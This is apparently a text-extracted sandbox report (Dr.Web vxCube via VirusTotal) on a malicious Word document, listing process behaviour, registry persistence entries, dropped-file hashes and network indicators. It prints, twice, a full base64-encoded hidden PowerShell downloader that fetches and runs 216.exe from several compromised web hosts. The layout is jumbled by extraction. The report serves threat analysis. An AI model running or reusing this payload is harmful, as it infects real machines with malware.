Professional Documents
Culture Documents
Prosegur Ioc Virustotal
Prosegur Ioc Virustotal
Size 226.3 KB
Format DOC
SHA1 2e7587c911694df2230b58df19f5295cc556cfb5
More
Behavior
Malicious Launching a process by exploiting the app vulnerability · Sending an HTTP GET
request to an infection source
Process graph
sample known threat malicious module process creation injection
web query RPC request
process maliciousness
1 100
TCP/IP
hope.ic....org:80 216.exe:3016 se
powershell.exe:876
winword.exe:2764
PID 2764
Full path %ProgramFiles%\microsoft
office\office14\winword.exe
Run parameters /n "<PATH_SAMPLE>.doc"
Behavior Creating a window
Description
[<HKLM>\SOFTWARE\CLASSES\Spiro.Document\shell\open\command] '' =
'%WINDIR%\SysWOW64\SCALAR~1.EXE "%1"'
[<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'Start' =
'00000002'
[<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'ImagePath' =
'"%WINDIR%\SysWOW64\scalarbuilder.exe"'
iAHkAaQBjAGsAdwA9ACcATgBpAGIAawBsAHUAcwBsAHAAcwBnACcAOwA
kAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAAgAD0AIAAnADIAMQA2ACcAOw
AkAFMAZABtAGMAawBpAGsAegB1AG8AbQA9ACcAUAB4AGEAeQByAHQA
ZwB6AHMAYwBrAG0A JwA7ACQATgBnAGYAcgBwAGoAbABsAHYAYwBwAH
UAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsA JwBc
ACcAKwAkAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAArACcALgBlAHgAZQAn
ADsA JABVAG0AeQB1AG4AdgBrAGcAZgBwAGgAbQBtAD0A JwBPAG4AeQB
oAGEAZABuAHAAdABvAGwA JwA7ACQATABsAGQAdgB1AGUAbABnAHAAY
QBzAGQAPQAmACgA JwBuAGUAdwAtAG8AYgBqAGUA JwArACcAYwAnACs
A JwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAYwBMAEkAZQBuAFQAOwAkAE
0AdgBkAGoAcwBhAGIAZgB1AG0AdQB6AGsAPQAnAGgAdAB0AHAAOgAvA
C8AaABvAHAAZQAuAGkAYwByAGkAcwBhAHQALgBvAHIAZwAvAHcAcAAtA
HMAbgBhAHAAcwBoAG8AdABzAC8AZAAzADcANgB1ADIAdwBvAHAALQB
5AGcAcwA5AGwAZgB5AC0ANQA2AC8AKgBoAHQAdABwADoALwAvAHQA
ZQBtAHAALgBzAGEAbABwAGcALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAb
gAvAHcANABnAHAAMQBpAHgAdgAwAC0AdABjAHEAbAAtADMAMAA0AD
QANAAwADYAMQAvACoAaAB0AHQAcABzADoALwAvAHMAawBkAGUAcw
BpAGcAbgBzAHQAdQBkAGkAbwAuADAAMAAwAHcAZQBiAGgAbwBzAHQ
AYQBwAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAegBjAGM
ALQA2ADkAZgBpAC0AMwAzAC8AKgBoAHQAdABwADoALwAvAGQAbwBjA
HMALgBqAGEAegBlAG4AZQB0AHcAbwByAGsAcwAuAGMAbwBtAC8AdwB
wAC0AaQBuAGMAbAB1AGQAZQBzAC8ANQBkAGoAYgA4AHAAbwBvAGkA
LQBwAG4ANwB0AG4AYQBzAHIALQA5ADYAOQA0ADUALwAqAGgAdAB0A
HAAcwA6AC8ALwBzAHUAcgBlAG4AYQByAG8AcgBhAC4AYwBvAG0ALwBjA
G8AbgBzAHUAbAB0AGEAdABpAG8AbgAvAG0AYwBvADMAbQBuAGwAeQ
BwAC0AaQAxAGEALQA0ADEANQA5ADAANAAwADEALwAnAC4AIgBzAGAA
UABMAEkAVAAiACgA JwAqACcAKQA7ACQAWgBiAGMAcQBhAGkAcABtAHY
AdAB6AD0A JwBJAHMAbABxAGUAZwBkAGwAZQBwACcAOwBmAG8AcgBl
AGEAYwBoACgA JABWAHQAawBjAHUAeQB3AHQAIABpAG4AIAAkAE0AdgB
kAGoAcwBhAGIAZgB1AG0AdQB6AGsAKQB7AHQAcgB5AHsA JABMAGwAZ
AB2AHUAZQBsAGcAcABhAHMAZAAuACIARABPAHcAbgBMAGAAbwBhAEQ
AZgBgAGkATABFACIAKAAkAFYAdABrAGMAdQB5AHcAdAAsACAA JABOAGc
AZgByAHAAagBsAGwAdgBjAHAAdQApADsA JABKAHcAZwB4AGYAZgBiAGY
AdAA9ACcATQByAGwAZQBuAGIAdAB0ACcAOwBJAGYAIAAoACgALgAoACc
ARwBlACcAKwAnAHQALQBJAHQAZQAnACsA JwBtACcAKQAgACQATgBnAG
YAcgBwAGoAbABsAHYAYwBwAHUAKQAuACIAbABgAEUATgBnAGAAVABIA
CIAIAAtAGcAZQAgADMAOQAzADIAOAApACAAewBbAEQAaQBhAGcAbgBv
AHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAY
QBgAFIAdAAiACgA JABOAGcAZgByAHAAagBsAGwAdgBjAHAAdQApADsA JA
BVAHYAZQBkAGsAZQBtAGYAdgBtAHEAPQAnAE0AaQBwAHEAbwB4AGMA
cABjAG8AegB5ACcAOwBiAHIAZQBhAGsAOwAkAFEAagBrAHYAbQBlAHMA
YgA9ACcAQgB2AHcAdABvAGwAcgB2AGUAdAByAGUA JwB9AH0AYwBhAH
QAYwBoAHsAfQB9ACQARQBiAHgAYgBzAGcAZgBlAD0A JwBXAHYAawBxAG
UAaAB6AGwA JwA=
http://hope.icrisat.org/wp-snapshots/d376u2wop-ygs9lfy-56/
http://190.195.148.163/results/ringin/ringin/merge/
UDP
'%HOMEPATH%\216.exe'
'%WINDIR%\syswow64\scalarbuilder.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD
PAAjACAAQQBwAGEAcABiAGwAbwBmAHUAIABoAHQAdABwAHMAOgAvA
C8AdwB3AHcALgBtAGkAYwByAG8AcwBvAGYAdAAuAGMAbwBtAC8ARgBjA
GoAbwBvAHQAbgBiAGQAdQB4ACAAIwA+ACAA JABGAGMAcgBhAHMAcgB
iAHkAaQBjAGsAdwA9ACcATgBpAGIAawBsAHUAcwBsAHAAcwBnACcAOwA
kAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAAgAD0AIAAnADIAMQA2ACcAOw
AkAFMAZABtAGMAawBpAGsAegB1AG8AbQA9ACcAUAB4AGEAeQByAHQA
ZwB6AHMAYwBrAG0A JwA7ACQATgBnAGYAcgBwAGoAbABsAHYAYwBwAH
UAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsA JwBc
ACcAKwAkAEYAcQBnAHEAcgBiAHUAdQBwAGUAdAArACcALgBlAHgAZQAn
ADsA JABVAG0AeQB1AG4AdgBrAGcAZgBwAGgAbQBtAD0A JwBPAG4AeQB
oAGEAZABuAHAAdABvAGwA JwA7ACQATABsAGQAdgB1AGUAbABnAHAAY
QBzAGQAPQAmACgA JwBuAGUAdwAtAG8AYgBqAGUA JwArACcAYwAnACs
A JwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAYwBMAEkAZQBuAFQAOwAkAE
0AdgBkAGoAcwBhAGIAZgB1AG0AdQB6AGsAPQAnAGgAdAB0AHAAOgAvA
C8AaABvAHAAZQAuAGkAYwByAGkAcwBhAHQALgBvAHIAZwAvAHcAcAAtA
HMAbgBhAHAAcwBoAG8AdABzAC8AZAAzADcANgB1ADIAdwBvAHAALQB
5AGcAcwA5AGwAZgB5AC0ANQA2AC8AKgBoAHQAdABwADoALwAvAHQA
ZQBtAHAALgBzAGEAbABwAGcALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAb
gAvAHcANABnAHAAMQBpAHgAdgAwAC0AdABjAHEAbAAtADMAMAA0AD
QANAAwADYAMQAvACoAaAB0AHQAcABzADoALwAvAHMAawBkAGUAcw
BpAGcAbgBzAHQAdQBkAGkAbwAuADAAMAAwAHcAZQBiAGgAbwBzAHQ
AYQBwAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGgAegBjAGM
https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 4/9
11/27/2019 vxCube — Report
ALQA2ADkAZgBpAC0AMwAzAC8AKgBoAHQAdABwADoALwAvAGQAbwBjA
HMALgBqAGEAegBlAG4AZQB0AHcAbwByAGsAcwAuAGMAbwBtAC8AdwB
wAC0AaQBuAGMAbAB1AGQAZQBzAC8ANQBkAGoAYgA4AHAAbwBvAGkA
LQBwAG4ANwB0AG4AYQBzAHIALQA5ADYAOQA0ADUALwAqAGgAdAB0A
HAAcwA6AC8ALwBzAHUAcgBlAG4AYQByAG8AcgBhAC4AYwBvAG0ALwBjA
G8AbgBzAHUAbAB0AGEAdABpAG8AbgAvAG0AYwBvADMAbQBuAGwAeQ
BwAC0AaQAxAGEALQA0ADEANQA5ADAANAAwADEALwAnAC4AIgBzAGAA
UABMAEkAVAAiACgA JwAqACcAKQA7ACQAWgBiAGMAcQBhAGkAcABtAHY
AdAB6AD0A JwBJAHMAbABxAGUAZwBkAGwAZQBwACcAOwBmAG8AcgBl
AGEAYwBoACgA JABWAHQAawBjAHUAeQB3AHQAIABpAG4AIAAkAE0AdgB
kAGoAcwBhAGIAZgB1AG0AdQB6AGsAKQB7AHQAcgB5AHsA JABMAGwAZ
AB2AHUAZQBsAGcAcABhAHMAZAAuACIARABPAHcAbgBMAGAAbwBhAEQ
AZgBgAGkATABFACIAKAAkAFYAdABrAGMAdQB5AHcAdAAsACAA JABOAGc
AZgByAHAAagBsAGwAdgBjAHAAdQApADsA JABKAHcAZwB4AGYAZgBiAGY
AdAA9ACcATQByAGwAZQBuAGIAdAB0ACcAOwBJAGYAIAAoACgALgAoACc
ARwBlACcAKwAnAHQALQBJAHQAZQAnACsA JwBtACcAKQAgACQATgBnAG
YAcgBwAGoAbABsAHYAYwBwAHUAKQAuACIAbABgAEUATgBnAGAAVABIA
CIAIAAtAGcAZQAgADMAOQAzADIAOAApACAAewBbAEQAaQBhAGcAbgBv
AHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAY
QBgAFIAdAAiACgA JABOAGcAZgByAHAAagBsAGwAdgBjAHAAdQApADsA JA
BVAHYAZQBkAGsAZQBtAGYAdgBtAHEAPQAnAE0AaQBwAHEAbwB4AGMA
cABjAG8AegB5ACcAOwBiAHIAZQBhAGsAOwAkAFEAagBrAHYAbQBlAHMA
YgA9ACcAQgB2AHcAdABvAGwAcgB2AGUAdAByAGUA JwB9AH0AYwBhAH
QAYwBoAHsAfQB9ACQARQBiAHgAYgBzAGcAZgBlAD0A JwBXAHYAawBxAG
UAaAB6AGwA JwA=' (with hidden window)
'%WINDIR%\splwow64.exe' 16384
%APPDATA%\microsoft\templates\nor
92a6f1190f833f155b40d97e2287a9516c7035c1 —
mal.dotm
%APPDATA%\microsoft\windows\recent
\customdestinations\590aee7bdd69b5 cac439e385e2b8faef5a041804afc628e71fe0db —
9b.customdestinations-ms
%APPDATA%\microsoft\windows\recent
\customdestinations\969252ce11249fd adf35643787affe1afb840f0999bf9e679c7ca86 —
d.customdestinations-ms
%APPDATA%\microsoft\windows\recent
\customdestinations\969252ce11249fd
adf35643787affe1afb840f0999bf9e679c7ca86 —
d.customdestinations-ms~rf16d17d.tm
p
%APPDATA%\microsoft\windows\recent
\customdestinations\aq3c0sp0xo03mjw cac439e385e2b8faef5a041804afc628e71fe0db —
7sbwq.temp
%APPDATA%\microsoft\windows\recent
\customdestinations\jhn0k7tyon9s8fzsi adf35643787affe1afb840f0999bf9e679c7ca86 —
qli.temp
%HOMEPATH%\216.exe 281f0b8bce96c27d12bbce931079bb77e6c7df13 —
%LOCALAPPDATA%\gdipfontcachev1.da
c5cc6b48b8a50ef3cd8a3603253670aa9ee8494f —
t
%LOCALAPPDATA%\microsoft\windows\
<INETFILES>\content.mso\233fcb2a.wm 8095738d4cb2c6cd77d02b3d4cd2609196cfc354 —
f
%LOCALAPPDATA%\microsoft\windows\
<INETFILES>\content.mso\2d64e985.w 8095738d4cb2c6cd77d02b3d4cd2609196cfc354 —
mf
show all
API log [640]
Time Process Event Arguments
IP 200.109.58.183:443 —
1–4 of 4 10